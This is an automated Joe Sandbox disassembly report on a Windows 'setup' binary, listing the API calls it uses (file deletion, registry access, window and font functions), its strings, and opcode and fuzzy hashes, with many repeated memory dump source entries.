• Deleting all files matching : "%s", xrefs: 00C17FF2
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$AttributesDelete$ErrorLast_strlen
• String ID: Deleting all files matching : "%s"$Deleting file : "%s"$FAILED to deleting file : "%s"
• API String ID: 3775870863-2364433603
• Opcode ID: bd29872e230896086ea8a1daa5534282fe2ba675b81eb5d472745c22e4deb49f
• Instruction ID: 7e83f01e160c2e46d8f646de77b5204d2b4a31a6944b01b6877bbdfba73587a4
• Opcode Fuzzy Hash: bd29872e230896086ea8a1daa5534282fe2ba675b81eb5d472745c22e4deb49f
• Instruction Fuzzy Hash: 06817B31904268EEDB20EBA4CC56AEEB7B8FF15710F10416AF415B7091DB306F89EB91
APIs
• __EH_prolog3.LIBCMT ref: 00C22AB7
• RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000037,Browse for File,00000000), ref: 00C22D58
Strings
Similarity
• API ID: H_prolog3RedrawWindow
• String ID: All Files (*.*)|*.*||$Browse for File
• API String ID: 474685049-4137175618
• Opcode ID: 327b7d3d4bad744f529f61a5c6aa9d02603a10c9d840159c9a5af2beedf3010c
• Instruction ID: 8b85108a009383560044fcc30540fb9a2e5e0ddf6626111405c0c55cf5847815
• Opcode Fuzzy Hash: 327b7d3d4bad744f529f61a5c6aa9d02603a10c9d840159c9a5af2beedf3010c
• Instruction Fuzzy Hash: A0819070711612FFEB18DF24D885FA9FBA5BF04300F04426DE8299B6A1DB70AE14DB90
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C0252A
  • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
Strings
Similarity
• API ID: DeallocateH_prolog3_
• String ID: Content-Length$Content-Type$Filename
• API String ID: 289593924-2927965255
• Opcode ID: ab767a0f1301b5b6348944db123433fb299c6bca1b3996f1b3e6fb692f0d8197
• Instruction ID: 881f2d3db4d81b2306f7021a44cfb34d9eeb4177abec6be391b8e08b2b1f230d
• Opcode Fuzzy Hash: ab767a0f1301b5b6348944db123433fb299c6bca1b3996f1b3e6fb692f0d8197
• Instruction Fuzzy Hash: 5D613D71E003199FDF14DFA8C899ADDB7B5BF48300F24816AE419EB295EB309A45DF50
Strings
Similarity
• API ID:
• String ID: ://$:/?_.#&;=$file
• API String ID: 0-1271483328
• Opcode ID: 38e232bf29cfeffbf1ac2ddb4b615bf36f9bcaff2e79537dcfc89cf09c834cc3
• Instruction ID: 768730be2f7f263f65e1390cf8b19ed645c230f6ba5d810795b23bbb806de214
• Opcode Fuzzy Hash: 38e232bf29cfeffbf1ac2ddb4b615bf36f9bcaff2e79537dcfc89cf09c834cc3
• Instruction Fuzzy Hash: D8417E75E101C11BEB312968ACC276B77DA8F92765F580079E85885203E7299B9393F3
APIs
• RemoveDirectoryW.KERNEL32(?), ref: 00C23EEC
• RemoveDirectoryW.KERNEL32(?), ref: 00C23F7A
  • Part of subcall function 00C2C0B0: FindClose.KERNEL32(?,?,?,00C23F10), ref: 00C2C0E9
Strings
Similarity
• API ID: DirectoryRemove$CloseFind
• String ID: *.*$x
• API String ID: 2984516050-2538783531
• Opcode ID: 6404b25d124210601510b3c557a666194621fd6bfafd6c8110fbce963e6d27f8
• Instruction ID: 27a0e773f70e08af7473a2c99ca356023466d57706d8af025f84005a7df927f4
• Opcode Fuzzy Hash: 6404b25d124210601510b3c557a666194621fd6bfafd6c8110fbce963e6d27f8
• Instruction Fuzzy Hash: 4531A8719002689ADB24EB54EC8AFEEB3BCEF10710F5006B5F515E2491EF35AF85DA50
APIs
• _strlen.LIBCMT ref: 00C26AE9
• lstrlenA.KERNEL32(00000000,?,?,?,00000000), ref: 00C26B55
• lstrlenA.KERNEL32(00000000,00000000), ref: 00C26B6C
Strings
Similarity
• API ID: lstrlen$_strlen
• String ID: text
• API String ID: 381002886-999008199
• Opcode ID: 345ddc0f22acecf4845b75ab008511bb1fbe765833e52eef8abe99be6dddef23
• Instruction ID: 7349b463e7437e6ae5d681fa0a95c7c0dcac0b1c16a5141772d014d4e8a39531
• Opcode Fuzzy Hash: 345ddc0f22acecf4845b75ab008511bb1fbe765833e52eef8abe99be6dddef23
• Instruction Fuzzy Hash: E3210831600111AFDB10EB19EC46E7A77A9EF44370F148265F819EB2A2DB31DE45FAB0
APIs
Strings
Similarity
• API ID: H_prolog3_
• String ID: Text file (*.txt)|*.txt|All Files (*.*)|*.*||$Unknown.txt$txt
• API String ID: 2427045233-3588990919
• Opcode ID: 087664a7a955bb7b71065477754a8db33dd84befe534e762322c18826b34c2bd
• Instruction ID: 6cfb2bdef2d29164cbd5099e9c17583300feb81ad04572c96ee08b4738edb5f6
• Opcode Fuzzy Hash: 087664a7a955bb7b71065477754a8db33dd84befe534e762322c18826b34c2bd
• Instruction Fuzzy Hash: 55219070D00618EEDF10EBA8CC52BEEB7B4AF19304F0080AAE51577191DA745F88EFA1
APIs
• _strlen.LIBCMT ref: 00C0EF37
• TextOutA.GDI32(?,?,?,?,00000000), ref: 00C0EF52
• GetTextExtentPoint32A.GDI32(?,?,00000000,?), ref: 00C0EF63
Strings
Similarity
• API ID: Text$ExtentPoint32_strlen
• String ID: %012u
• API String ID: 3127108945-3617517997
• Opcode ID: 76201bcdcf4e48eaead9fd65a6559526ac3a304558a1160e35501457d0ec60ec
• Instruction ID: e4121c1986fcc1e8483a91e5c2571ce4f1c059e01f71908e9580754c45e347d7
• Opcode Fuzzy Hash: 76201bcdcf4e48eaead9fd65a6559526ac3a304558a1160e35501457d0ec60ec
• Instruction Fuzzy Hash: C411517260020EABDB10EFA4DC4AEEF7BB8EB49714F040469F641E7181D674E545DBE0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C01E10
• SetLastError.KERNEL32(0000007E,?,Cookie: ,00000000,00000020,00C01B22,00000000,00000000), ref: 00C01EB1
• GetLastError.KERNEL32 ref: 00C01EB7
Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                          • String ID: Cookie:
                                                                                                                          • API String ID: 3339191932-3195769419
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C22AB0: __EH_prolog3.LIBCMT ref: 00C22AB7
                                                                                                                            • Part of subcall function 00C22AB0: RedrawWindow.USER32(?,00000000,00000000,00000105,00000000,00000000,00000000,00000000,00000000,00000037,Browse for File,00000000), ref: 00C22D58
                                                                                                                          • IsWindow.USER32(?), ref: 00C2098C
                                                                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C209A0
                                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C209BB
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendWindow$H_prolog3Redraw
                                                                                                                          • String ID: EDIT
                                                                                                                          • API String ID: 1457668980-3080729518
                                                                                                                          APIs
                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?,00000000,?,?,?,00C1F357,?,?), ref: 00C1EE79
                                                                                                                          • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 00C1EE8F
                                                                                                                          • wsprintfW.USER32 ref: 00C1EED4
                                                                                                                          Strings
                                                                                                                          • %d/%d/%d %02d:%02d:%02d, xrefs: 00C1EECE
                                                                                                                          Similarity
                                                                                                                          • API ID: Time$File$DateLocalwsprintf
                                                                                                                          • String ID: %d/%d/%d %02d:%02d:%02d
                                                                                                                          • API String ID: 3193010481-3190809460
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3F2B5: EnterCriticalSection.KERNEL32(00CC3BA0,?,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F2E6
                                                                                                                            • Part of subcall function 00C3F2B5: InitializeCriticalSection.KERNEL32(00000000,?,00C2F254,00000001), ref: 00C3F2FC
                                                                                                                            • Part of subcall function 00C3F2B5: LeaveCriticalSection.KERNEL32(00CC3BA0,?,00C2F254,00000001), ref: 00C3F30A
                                                                                                                            • Part of subcall function 00C3F2B5: EnterCriticalSection.KERNEL32(00000000,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F317
                                                                                                                            • Part of subcall function 00C3E41C: __EH_prolog3_catch.LIBCMT ref: 00C3E423
                                                                                                                            • Part of subcall function 00C2FABA: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00C2FAE0
                                                                                                                            • Part of subcall function 00C2FABA: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C2FAF0
                                                                                                                            • Part of subcall function 00C2FABA: EncodePointer.KERNEL32(00000000), ref: 00C2FAF9
                                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 00C2F19B
                                                                                                                          • FreeLibrary.KERNEL32(?,?,00C2DD73,?,00000000,?,00C38AF2,?,00000000,?,?,00000000,00C36095,?,00000007), ref: 00C2F1AB
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AddressEnterProc$EncodeFreeH_prolog3_catchHandleInitializeLeaveLibraryModulePointer
                                                                                                                          • String ID: HtmlHelpW$hhctrl.ocx
                                                                                                                          • API String ID: 849444252-3773518134
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(?,?,?,00000000,00000004), ref: 00C6A658
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID: file:///$file://localhost/
                                                                                                                          • API String ID: 3188754299-3684072235
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll,?), ref: 00C3B465
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00C3B475
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyTransactedW
                                                                                                                          • API String ID: 1646373207-2168864297
                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00C3D681
                                                                                                                          • GetClassNameW.USER32(?,?,0000000A), ref: 00C3D696
                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF), ref: 00C3D6AD
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassCompareLongNameStringWindow
                                                                                                                          • String ID: combobox
                                                                                                                          • API String ID: 1414938635-2240613097
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C44564
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetFileAttributesTransactedW), ref: 00C44574
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: GetFileAttributesTransactedW$kernel32.dll
                                                                                                                          • API String ID: 1646373207-1378992308
                                                                                                                          • Opcode ID: cee86d97ab5297b48dd5eeaa9dc112b8d4b5cea760194ec91bf1c2f8660945cf
                                                                                                                          • Instruction ID: ac15a1832871c4d1ce8973ed3e8f77d1aede54c229addfe29295506d147a5e44
                                                                                                                          • Opcode Fuzzy Hash: cee86d97ab5297b48dd5eeaa9dc112b8d4b5cea760194ec91bf1c2f8660945cf
                                                                                                                          • Instruction Fuzzy Hash: 89F03032200706EFDF255F94EC4CB6E77A8FF04395F24443AF955911A0D7718A50D750
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00C1E93D
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 00C1E94D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                                          • API String ID: 1646373207-2994018265
                                                                                                                          • Opcode ID: 04dad9fd23ea637b16c971da35a3042574dab9e00251dbeb05ff43126e3b20e7
                                                                                                                          • Instruction ID: 996720502d0b61369a6252315ba3f9ce078754120e05171d45623617d1aa6e83
                                                                                                                          • Opcode Fuzzy Hash: 04dad9fd23ea637b16c971da35a3042574dab9e00251dbeb05ff43126e3b20e7
                                                                                                                          • Instruction Fuzzy Hash: BFF03C32150209EBDF210F94AC04FD9BBA5BB19756F044525FA15D50B0C376C8B0EB50
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00C1EA0F
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00C1EA1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                          • API String ID: 1646373207-3913318428
                                                                                                                          • Opcode ID: ecc91ace398774d1be84e677ac326922c54a5c727e5b914c9ef156a7d3d2ec5d
                                                                                                                          • Instruction ID: 7ebeecde54437ff792e11ce3519a6d75632e2f8297fa5e0880afb535c62af0ba
                                                                                                                          • Opcode Fuzzy Hash: ecc91ace398774d1be84e677ac326922c54a5c727e5b914c9ef156a7d3d2ec5d
                                                                                                                          • Instruction Fuzzy Hash: 76F0FE32144209FBDF215F959C08BEA7FA9BF05751F088426FA51D50A0D772D9A0FB60
                                                                                                                          APIs
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C70E13,00000000,?,00CC44CC,?,?,?,00C70FB6,00000004,InitializeCriticalSectionEx,00CA47EC,InitializeCriticalSectionEx), ref: 00C70E6F
                                                                                                                          • GetLastError.KERNEL32(?,00C70E13,00000000,?,00CC44CC,?,?,?,00C70FB6,00000004,InitializeCriticalSectionEx,00CA47EC,InitializeCriticalSectionEx,00000000,?,00C70D6D), ref: 00C70E79
                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C70EA1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                          • String ID: api-ms-
                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                          • Opcode ID: 218b330aca39a16d250edaba0abfb3c86649173d090403c2a4b6e4a843062e72
                                                                                                                          • Instruction ID: 7aabb02236e50c0d449aa1a9474e53f1ab57aaea9c336f7879ba47bde13d3d74
                                                                                                                          • Opcode Fuzzy Hash: 218b330aca39a16d250edaba0abfb3c86649173d090403c2a4b6e4a843062e72
                                                                                                                          • Instruction Fuzzy Hash: 73E0B870680205FBEB111B61EC0BB6D3E55BB05B95F248421F98DE44F2D7A1EA509684
                                                                                                                          APIs
                                                                                                                          • GetConsoleOutputCP.KERNEL32(4641B5ED,00000000,00000000,?), ref: 00C8AD90
                                                                                                                            • Part of subcall function 00C87374: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00C8ABB5,?,00000000,-00000008), ref: 00C873D5
                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8AFE2
                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C8B028
                                                                                                                          • GetLastError.KERNEL32 ref: 00C8B0CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2112829910-0
                                                                                                                          • Opcode ID: f41b411ea3f5df0affa798b555e2ae9aac827a41330d9ff17533c64ef203c30c
                                                                                                                          • Instruction ID: 6673a651560c78bb0501cc1cec08e53a4a12a6d3f58ff408e449cf3b4339a366
                                                                                                                          • Opcode Fuzzy Hash: f41b411ea3f5df0affa798b555e2ae9aac827a41330d9ff17533c64ef203c30c
                                                                                                                          • Instruction Fuzzy Hash: 23D19CB5D002489FDF15DFA8C880AAEBBB5FF09318F28456AE426EB351D730AD41CB54
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,00000000,00000000), ref: 00C020FA
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000), ref: 00C0210C
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C02164
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C0216F
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C0217A
                                                                                                                            • Part of subcall function 00C01ED5: SetLastError.KERNEL32(0000007E,?,?,?,?,74DEFFC0,00000000), ref: 00C01F33
                                                                                                                            • Part of subcall function 00C01ED5: GetLastError.KERNEL32(?,?,?,?,74DEFFC0,00000000), ref: 00C01F60
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3862222148-0
                                                                                                                          • Opcode ID: 5261696ce1911d7e8559c329c4ebedaf37ea1724fbebf145535b7c5aff5d0687
                                                                                                                          • Instruction ID: c15b4277e3c3a05d795700e966b33066a1438053fa4afbf8ecdb3ca876d61f72
                                                                                                                          • Opcode Fuzzy Hash: 5261696ce1911d7e8559c329c4ebedaf37ea1724fbebf145535b7c5aff5d0687
                                                                                                                          • Instruction Fuzzy Hash: 37215E30A00209EBDF159BA5DC49BAEBB79BF44344F044066EA25921D0DB719E45DB90
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C25AB7
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C25C46
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00C25CB4
                                                                                                                          • GetCharABCWidthsW.GDI32(?,00000000,000000FF,?), ref: 00C25D04
                                                                                                                            • Part of subcall function 00C26446: __EH_prolog3_GS.LIBCMT ref: 00C2644D
                                                                                                                            • Part of subcall function 00C25A48: GetCharABCWidthsW.GDI32(?,?,?,?), ref: 00C25A8F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharCreateFontH_prolog3_IndirectWidths
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1348433551-0
                                                                                                                          • Opcode ID: cdae4f4d440cb89899c9da56045e3104316faaa92c852986d39ad6fb8e78c163
                                                                                                                          • Instruction ID: 2d4cfb0887a415b0bbca89574594e25e704724189cb2f90bdc0ace0c39ed78cc
                                                                                                                          • Opcode Fuzzy Hash: cdae4f4d440cb89899c9da56045e3104316faaa92c852986d39ad6fb8e78c163
                                                                                                                          • Instruction Fuzzy Hash: 65E1DA70A001298FDF68DF28D994FD9B7B5BF49300F1446EAE809AB656DB305E85CF50
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C42F19
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC2A
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC39
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C4309E
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C430B1
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C4310B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$EnumH_prolog3_Value
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 431837299-0
                                                                                                                          • Opcode ID: 5b8334902df294bfe80d7e9a002038688141d33e6b799c318b60b293460eef48
                                                                                                                          • Instruction ID: 29b40942680557471e707a687f2cfe752266dcbae7760303a00ec9133694deae
                                                                                                                          • Opcode Fuzzy Hash: 5b8334902df294bfe80d7e9a002038688141d33e6b799c318b60b293460eef48
                                                                                                                          • Instruction Fuzzy Hash: D4510CB1A001289BCB21DB54CC89ADEBBBCFF48714F4041DAF609A7251DA705F85DFA8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1783f6c642929a4854fd8e7953672e434b77d5f7384fcf0e99eb56a4611544f0
                                                                                                                          • Instruction ID: 474a295af393dba4b672a25cf160d79fafbd6b2a8b9fefe7c31956c6dfa937d4
                                                                                                                          • Opcode Fuzzy Hash: 1783f6c642929a4854fd8e7953672e434b77d5f7384fcf0e99eb56a4611544f0
                                                                                                                          • Instruction Fuzzy Hash: 7F41C672A00304AFE7149F79CC41B6EBBA9FBC8710F10C62AF119DB2D1D7719A519782
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,00CAE150,?,00001000,?), ref: 00C3AF34
                                                                                                                            • Part of subcall function 00C3AF66: RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C3AD94,?,00000000), ref: 00C3AFAB
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,00000000,4641B5ED,?,?,?,?,00C94D63,000000FF), ref: 00C3AE82
                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,00C94D63,000000FF), ref: 00C3AEBE
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,00C94D63,000000FF), ref: 00C3AED8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
